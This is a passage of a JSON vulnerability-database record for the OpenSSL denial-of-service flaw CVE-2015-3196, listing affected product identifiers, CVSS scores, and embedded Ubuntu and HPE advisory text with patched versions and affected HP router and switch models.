openssl 1.0.0q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "oncommand unified manager host package", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.9" } ], "sources": [ { "db": "BID", "id": "78622" }, { "db": "JVNDB", "id": "JVNDB-2015-006117" }, { "db": "CNNVD", "id": "CNNVD-201512-076" }, { "db": "NVD", "id": "CVE-2015-3196" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso:10.0:*:*:*:certd:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso_agent_option:10.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.3.35", "versionStartIncluding": "4.3.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "5.0.13", "versionStartIncluding": "5.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-3196" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Dr. Stephen Henson of the OpenSSL development team", "sources": [ { "db": "BID", "id": "78622" } ], "trust": 0.3 }, "cve": "CVE-2015-3196", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 4.3, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-3196", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-3196", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201512-076", "trust": 0.6, "value": "LOW" }, { "author": "VULMON", "id": "CVE-2015-3196", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3196" }, { "db": "JVNDB", "id": "JVNDB-2015-006117" }, { "db": "CNNVD", "id": "CNNVD-201512-076" }, { "db": "NVD", "id": "CVE-2015-3196" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ssl/s3_clnt.c in OpenSSL 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1p, and 1.0.2 before 1.0.2d, when used for a multi-threaded client, writes the PSK identity hint to an incorrect data structure, which allows remote servers to cause a denial of service (race condition and double free) via a crafted ServerKeyExchange message. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to cause a denial-of-service condition. ============================================================================\nUbuntu Security Notice USN-2830-1\nDecember 07, 2015\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This issue only applied to Ubuntu 15.10. This issue only\napplied to Ubuntu 15.10. \n(CVE-2015-3194)\n\nAdam Langley discovered that OpenSSL incorrectly handled malformed\nX509_ATTRIBUTE structures. \n(CVE-2015-3195)\n\nIt was discovered that OpenSSL incorrectly handled PSK identity hints. This issue only applied to Ubuntu 12.04\nLTS, Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-3196)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n libssl1.0.0 1.0.2d-0ubuntu1.2\n\nUbuntu 15.04:\n libssl1.0.0 1.0.1f-1ubuntu11.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.16\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.32\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05398322\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05398322\nVersion: 1\n\nHPESBHF03709 rev.1 - HPE Network products including Comware, IMC, and VCX\nrunning OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-02-21\nLast Updated: 2017-02-21\n\nPotential Security Impact: Remote: Denial of Service (DoS), Disclosure of\nSensitive Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed for HPE\nNetwork products including Comware 5, Comware 7, IMC, and VCX. The\nvulnerabilities could be remotely exploited resulting in Denial of Service\n(DoS) or disclosure of sensitive information. \n\nReferences:\n\n - CVE-2015-1794 - Remote Denial of Service (DoS)\n - CVE-2015-3193 - Remote disclosure of sensitive information\n - CVE-2015-3194 - Remote Denial of Service (DoS)\n - CVE-2015-3195 - Remote disclosure of sensitive information\n - CVE-2015-3196 - Remote Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - Comware 5 (CW5) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n - Comware 7 (CW7) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n - HPE Intelligent Management Center (iMC) All versions - Please refer to\nthe RESOLUTION below for a list of updated products. \n - VCX Products All versions - Please refer to the RESOLUTION below for a\nlist of updated products. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2015-1794\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2015-3193\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n CVE-2015-3194\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2015-3195\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2015-3196\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates to resolve the vulnerabilities in\nthe Comware, IMC and VCX products running OpenSSL. \n\n\n**COMWARE 5 Products**\n\n + **A6600 (Comware 5) - Version: R3303P28**\n * HP Network Products\n - JC165A HP 6600 RPE-X1 Router Module\n - JC177A HP 6608 Router\n - JC177B HP 6608 Router Chassis\n - JC178A HP 6604 Router Chassis\n - JC178B HP 6604 Router Chassis\n - JC496A HP 6616 Router Chassis\n - JC566A HP 6600 RSE-X1 Router Main Processing Unit\n - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit\n - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit\n + **HSR6602 (Comware 5) - Version: R3303P28**\n * HP Network Products\n - JC176A HP 6602 Router Chassis\n - JG353A HP HSR6602-G Router\n - JG354A HP HSR6602-XG Router\n - JG355A HP 6600 MCP-X1 Router Main Processing Unit\n - JG356A HP 6600 MCP-X2 Router Main Processing Unit\n - JG776A HP HSR6602-G TAA-compliant Router\n - JG777A HP HSR6602-XG TAA-compliant Router\n - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit\n + **HSR6800 (Comware 5) - Version: R3303P28**\n * HP Network Products\n - JG361A HP HSR6802 Router Chassis\n - JG361B HP HSR6802 Router Chassis\n - JG362A HP HSR6804 Router Chassis\n - JG362B HP HSR6804 Router Chassis\n - JG363A HP HSR6808 Router Chassis\n - JG363B HP HSR6808 Router Chassis\n - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n + **MSR20 (Comware 5) - Version: R2516**\n * HP Network Products\n - JD432A HP A-MSR20-21 Router\n - JD662A HP MSR20-20 Router\n - JD663A HP A-MSR20-21 Router\n - JD663B HP MSR20-21 Router\n - JD664A HP MSR20-40 Router\n - JF228A HP MSR20-40 Router\n - JF283A HP MSR20-20 Router\n + **MSR20-1X (Comware 5) - Version: R2516**\n * HP Network Products\n - JD431A HP MSR20-10 Router\n - JD667A HP MSR20-15 IW Multi-Service Router\n - JD668A HP MSR20-13 Multi-Service Router\n - JD669A HP MSR20-13 W Multi-Service Router\n - JD670A HP MSR20-15 A Multi-Service Router\n - JD671A HP MSR20-15 AW Multi-Service Router\n - JD672A HP MSR20-15 I Multi-Service Router\n - JD673A HP MSR20-11 Multi-Service Router\n - JD674A HP MSR20-12 Multi-Service Router\n - JD675A HP MSR20-12 W Multi-Service Router\n - JD676A HP MSR20-12 T1 Multi-Service Router\n - JF236A HP MSR20-15-I Router\n - JF237A HP MSR20-15-A Router\n - JF238A HP MSR20-15-I-W Router\n - JF239A HP MSR20-11 Router\n - JF240A HP MSR20-13 Router\n - JF241A HP MSR20-12 Router\n - JF806A HP MSR20-12-T Router\n - JF807A HP MSR20-12-W Router\n - JF808A HP MSR20-13-W Router\n - JF809A HP MSR20-15-A-W Router\n - JF817A HP MSR20-15 Router\n - JG209A HP MSR20-12-T-W Router (NA)\n - JG210A HP MSR20-13-W Router (NA)\n + **MSR 30 (Comware 5) - Version: R2516**\n * HP Network Products\n - JD654A HP MSR30-60 POE Multi-Service Router\n - JD657A HP MSR30-40 Multi-Service Router\n - JD658A HP MSR30-60 Multi-Service Router\n - JD660A HP MSR30-20 POE Multi-Service Router\n - JD661A HP MSR30-40 POE Multi-Service Router\n - JD666A HP MSR30-20 Multi-Service Router\n - JF229A HP MSR30-40 Router\n - JF230A HP MSR30-60 Router\n - JF232A HP RTMSR3040-AC-OVSAS-H3\n - JF235A HP MSR30-20 DC Router\n - JF284A HP MSR30-20 Router\n - JF287A HP MSR30-40 DC Router\n - JF801A HP MSR30-60 DC Router\n - JF802A HP MSR30-20 PoE Router\n - JF803A HP MSR30-40 PoE Router\n - JF804A HP MSR30-60 PoE Router\n - JG728A HP MSR30-20 TAA-compliant DC Router\n - JG729A HP MSR30-20 TAA-compliant Router\n + **MSR 30-16 (Comware 5) - Version: R2516**\n * HP Network Products\n - JD659A HP MSR30-16 POE Multi-Service Router\n - JD665A HP MSR30-16 Multi-Service Router\n - JF233A HP MSR30-16 Router\n - JF234A HP MSR30-16 PoE Router\n + **MSR 30-1X (Comware 5) - Version: R2516**\n * HP Network Products\n - JF800A HP MSR30-11 Router\n - JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\n - JG182A HP MSR30-11E Router\n - JG183A HP MSR30-11F Router\n - JG184A HP MSR30-10 DC Router\n + **MSR 50 (Comware 5) - Version: R2516**\n * HP Network Products\n - JD433A HP MSR50-40 Router\n - JD653A HP MSR50 Processor Module\n - JD655A HP MSR50-40 Multi-Service Router\n - JD656A HP MSR50-60 Multi-Service Router\n - JF231A HP MSR50-60 Router\n - JF285A HP MSR50-40 DC Router\n - JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n + **MSR 50-G2 (Comware 5) - Version: R2516**\n * HP Network Products\n - JD429A HP MSR50 G2 Processor Module\n - JD429B HP MSR50 G2 Processor Module\n + **MSR 9XX (Comware 5) - Version: R2516**\n * HP Network Products\n - JF812A HP MSR900 Router\n - JF813A HP MSR920 Router\n - JF814A HP MSR900-W Router\n - JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr\n - JG207A HP MSR900-W Router (NA)\n - JG208A HP MSR920-W Router (NA)\n + **MSR 93X (Comware 5) - Version: R2516**\n * HP Network Products\n - JG511A HP MSR930 Router\n - JG511B HP MSR930 Router\n - JG512A HP MSR930 Wireless Router\n - JG513A HP MSR930 3G Router\n - JG513B HP MSR930 3G Router\n - JG514A HP MSR931 Router\n - JG514B HP MSR931 Router\n - JG515A HP MSR931 3G Router\n - JG516A HP MSR933 Router\n - JG517A HP MSR933 3G Router\n - JG518A HP MSR935 Router\n - JG518B HP MSR935 Router\n - JG519A HP MSR935 Wireless Router\n - JG520A HP MSR935 3G Router\n - JG531A HP MSR931 Dual 3G Router\n - JG531B HP MSR931 Dual 3G Router\n - JG596A HP MSR930 4G LTE/3G CDMA Router\n - JG597A HP MSR936 Wireless Router\n - JG665A HP MSR930 4G LTE/3G WCDMA Global Router\n - JG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n - JH009A HP MSR931 Serial (TI) Router\n - JH010A HP MSR933 G.SHDSL (TI) Router\n - JH011A HP MSR935 ADSL2+ (TI) Router\n - JH012A HP MSR930 Wireless 802.11n (NA) Router\n - JH012B HP MSR930 Wireless 802.11n (NA) Router\n - JH013A HP MSR935 Wireless 802.11n (NA) Router\n + **MSR1000 (Comware 5) - Version: See Mitigation**\n * HP Network Products\n - JG732A HP MSR1003-8 AC Router\n + **12500 (Comware 5) - Version: R1829P02**\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JC808A HP 12500 TAA Main Processing Unit\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n + **9500E (Comware 5) - Version: R1829P02**\n * HP Network Products\n - JC124A HP A9508 Switch Chassis\n - JC124B HP 9505 Switch Chassis\n - JC125A HP A9512 Switch Chassis\n - JC125B HP 9512 Switch Chassis\n - JC474A HP A9508-V Switch Chassis\n - JC474B HP 9508-V Switch Chassis\n + **10500 (Comware 5) - Version: R1210P02**\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC614A HP 10500 Main Processing Unit\n - JC748A HP 10512 Switch Chassis\n - JG375A HP 10500 TAA-compliant Main Processing Unit\n - JG820A HP 10504 TAA-compliant Switch Chassis\n - JG821A HP 10508 TAA-compliant Switch Chassis\n - JG822A HP 10508-V TAA-compliant Switch Chassis\n - JG823A HP 10512 TAA-compliant Switch Chassis\n + **7500 (Comware 5) - Version: R6710P02**\n * HP Network Products\n - JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port\nGig-T/4-port GbE Combo\n - JC697A HP 7502 TAA-compliant Main Processing Unit\n - JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8\nGbE Combo Ports\n - JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP\nPorts\n - JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit\n - JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit\n - JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports\n - JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports\n - JD194A HP 7500 384Gbps Fabric Module\n - JD194B HP 7500 384Gbps Fabric Module\n - JD195A HP 7500 384Gbps Advanced Fabric Module\n - JD196A HP 7502 Fabric Module\n - JD220A HP 7500 768Gbps Fabric Module\n - JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports\n - JD238A HP 7510 Switch Chassis\n - JD238B HP 7510 Switch Chassis\n - JD239A HP 7506 Switch Chassis\n - JD239B HP 7506 Switch Chassis\n - JD240A HP 7503 Switch Chassis\n - JD240B HP 7503 Switch Chassis\n - JD241A HP 7506-V Switch Chassis\n - JD241B HP 7506-V Switch Chassis\n - JD242A HP 7502 Switch Chassis\n - JD242B HP 7502 Switch Chassis\n - JD243A HP 7503-S Switch Chassis with 1 Fabric Slot\n - JD243B HP 7503-S Switch Chassis with 1 Fabric Slot\n - JE164A HP E7902 Switch Chassis\n - JE165A HP E7903 Switch Chassis\n - JE166A HP E7903 1 Fabric Slot Switch Chassis\n - JE167A HP E7906 Switch Chassis\n - JE168A HP E7906 Vertical Switch Chassis\n - JE169A HP E7910 Switch Chassis\n + **6125G/XG Blade Switch - Version: R2112P05**\n * HP Network Products\n - 737220-B21 HP 6125G Blade Switch with TAA\n - 737226-B21 HP 6125G/XG Blade Switch with TAA\n - 658250-B21 HP 6125G/XG Blade Switch Opt Kit\n - 658247-B21 HP 6125G Blade Switch Opt Kit\n + **5830 (Comware 5) - Version: R1118P13**\n * HP Network Products\n - JC691A HP 5830AF-48G Switch with 1 Interface Slot\n - JC694A HP 5830AF-96G Switch\n - JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot\n - JG374A HP 5830AF-96G TAA-compliant Switch\n + **5800 (Comware 5) - Version: R1810P03**\n * HP Network Products\n - JC099A HP 5800-24G-PoE Switch\n - JC099B HP 5800-24G-PoE+ Switch\n - JC100A HP 5800-24G Switch\n - JC100B HP 5800-24G Switch\n - JC101A HP 5800-48G Switch with 2 Slots\n - JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots\n - JC103A HP 5800-24G-SFP Switch\n - JC103B HP 5800-24G-SFP Switch with 1 Interface Slot\n - JC104A HP 5800-48G-PoE Switch\n - JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot\n - JC105A HP 5800-48G Switch\n - JC105B HP 5800-48G Switch with 1 Interface Slot\n - JG254A HP 5800-24G-PoE+ TAA-compliant Switch\n - JG254B HP 5800-24G-PoE+ TAA-compliant Switch\n - JG255A HP 5800-24G TAA-compliant Switch\n - JG255B HP 5800-24G TAA-compliant Switch\n - JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot\n - JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot\n - JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot\n - JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot\n - JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n - JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n - JG225A HP 5800AF-48G 